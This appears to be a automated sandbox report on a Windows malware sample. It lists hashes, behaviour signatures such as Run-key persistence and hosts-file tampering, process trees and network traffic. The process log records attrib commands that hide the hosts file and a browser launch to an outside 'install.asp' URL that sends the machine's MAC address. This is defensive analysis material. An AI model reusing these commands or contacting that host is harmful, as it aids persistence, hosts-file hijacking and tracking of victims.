Analysis

  • max time kernel
    44s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2024 03:51

General

  • Target

    42aea7e72270c79f9f577b979828bc0d.exe

  • Size

    47KB

  • MD5

    42aea7e72270c79f9f577b979828bc0d

  • SHA1

    8fa941a906a756b11e000db02cb3d06a4a51f976

  • SHA256

    b5ae6d2c48d06d0764e04b5c8e57dff529aa74bf57f10b652a4b040fe8d30ad7

  • SHA512

    61d8cf5ca3b7fc570718fdad605aba5940a62b138bbbf17088f35236d7de7a4d216eee05928ed72d565b904865cbaaca44888000d57e3db70c8aae682d173702

  • SSDEEP

    768:o6QZ/MVvp3w/qUfsRd9Zsb5CDsaSur5dikXB5ZCgcFEaW6FqTwPhrvSQ1KIsmY:s/MVvp3w/hcG5esaSur5A6ZCgRbVTkA5

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe
    "C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe"
    1⤵
    • Adds policy Run key to start application
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\SysWOW64\attrib.exe
      attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
      2⤵
      • Views/modifies file attributes
      PID:2820
    • C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:5024
    • C:\program files\internet explorer\iexplore.exe
      "C:\program files\internet explorer\iexplore.exe" "http://www.2009ylm.cn/union/install.asp?ver=090107&tgid=p222&address=FE-6B-1C-63-FC-C4&regk=1&flag=49b94138570212aa317e658a0d60d8c6&frandom=9969"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4952 CREDAT:17410 /prefetch:2
        3⤵
          PID:3876
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x50c 0x4a0
      1⤵
        PID:1440

      Network

      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.a-0001.a-msedge.net
        g-bing-com.a-0001.a-msedge.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 8CBF64E5B7D14CF38A828013491E2CCA Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
        date: Fri, 05 Jan 2024 03:51:36 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: F69A40A4FF924529947CB2BF47B4D76E Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
        date: Fri, 05 Jan 2024 03:51:36 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 7BAF3360C5964F62B37AA24CEF906992 Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
        date: Fri, 05 Jan 2024 03:51:37 GMT
      • flag-us
        DNS
        208.194.73.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        208.194.73.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        208.194.73.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        208.194.73.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        173.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        173.178.17.96.in-addr.arpa
        IN PTR
        Response
        173.178.17.96.in-addr.arpa
        IN PTR
        a96-17-178-173deploystaticakamaitechnologiescom
      • flag-us
        DNS
        173.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        173.178.17.96.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        200.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        200.197.79.204.in-addr.arpa
        IN PTR
        Response
        200.197.79.204.in-addr.arpa
        IN PTR
        a-0001a-msedgenet
      • flag-us
        DNS
        200.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        200.197.79.204.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        19.177.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        19.177.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        158.240.127.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        158.240.127.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        241.154.82.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.154.82.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.58.199.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.58.199.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        157.123.68.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        157.123.68.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        0.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        41.110.16.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        41.110.16.96.in-addr.arpa
        IN PTR
        Response
        41.110.16.96.in-addr.arpa
        IN PTR
        a96-16-110-41deploystaticakamaitechnologiescom
      • flag-us
        DNS
        tse1.mm.bing.net
        Remote address:
        8.8.8.8:53
        Request
        tse1.mm.bing.net
        IN A
        Response
        tse1.mm.bing.net
        IN CNAME
        mm-mm.bing.net.trafficmanager.net
        mm-mm.bing.net.trafficmanager.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • 204.79.197.200:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=
        tls, http2
        2.2kB
        9.9kB
        23
        17

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=

        HTTP Response

        204
      • 13.85.23.206:443
        tls, https
        5.2kB
        1.4kB
        7
        5
      • 51.124.78.146:443
      • 51.124.78.146:443
      • 51.124.78.146:443
      • 13.85.23.206:443
      • 138.91.171.81:80
      • 88.221.134.18:80
      • 20.103.156.88:443
        2.5kB
        27.4kB
        49
        48
      • 20.103.156.88:443
        46 B
        1
      • 20.103.156.88:443
        46 B
        1
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls
        1.6kB
        8.3kB
        17
        14
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls
        1.6kB
        8.3kB
        17
        14
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls
        37.7kB
        973.7kB
        717
        713
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls
        803 B
        152 B
        6
        3
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls
        1.2kB
        589 B
        11
        8
      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        158 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.200
        13.107.21.200

      • 8.8.8.8:53
        208.194.73.20.in-addr.arpa
        dns
        144 B
        158 B
        2
        1

        DNS Request

        208.194.73.20.in-addr.arpa

        DNS Request

        208.194.73.20.in-addr.arpa

      • 8.8.8.8:53
        173.178.17.96.in-addr.arpa
        dns
        144 B
        137 B
        2
        1

        DNS Request

        173.178.17.96.in-addr.arpa

        DNS Request

        173.178.17.96.in-addr.arpa

      • 8.8.8.8:53
        200.197.79.204.in-addr.arpa
        dns
        146 B
        106 B
        2
        1

        DNS Request

        200.197.79.204.in-addr.arpa

        DNS Request

        200.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        19.177.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        19.177.190.20.in-addr.arpa

      • 8.8.8.8:53
        158.240.127.40.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        158.240.127.40.in-addr.arpa

      • 8.8.8.8:53
        241.154.82.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        241.154.82.20.in-addr.arpa

      • 8.8.8.8:53
        43.58.199.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        43.58.199.20.in-addr.arpa

      • 8.8.8.8:53
        157.123.68.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        157.123.68.40.in-addr.arpa

      • 8.8.8.8:53
        0.159.190.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        0.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        41.110.16.96.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        41.110.16.96.in-addr.arpa

      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
      • 8.8.8.8:53
        tse1.mm.bing.net
        dns
        62 B
        173 B
        1
        1

        DNS Request

        tse1.mm.bing.net

        DNS Response

        204.79.197.200
        13.107.21.200

      • 8.8.8.8:53

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.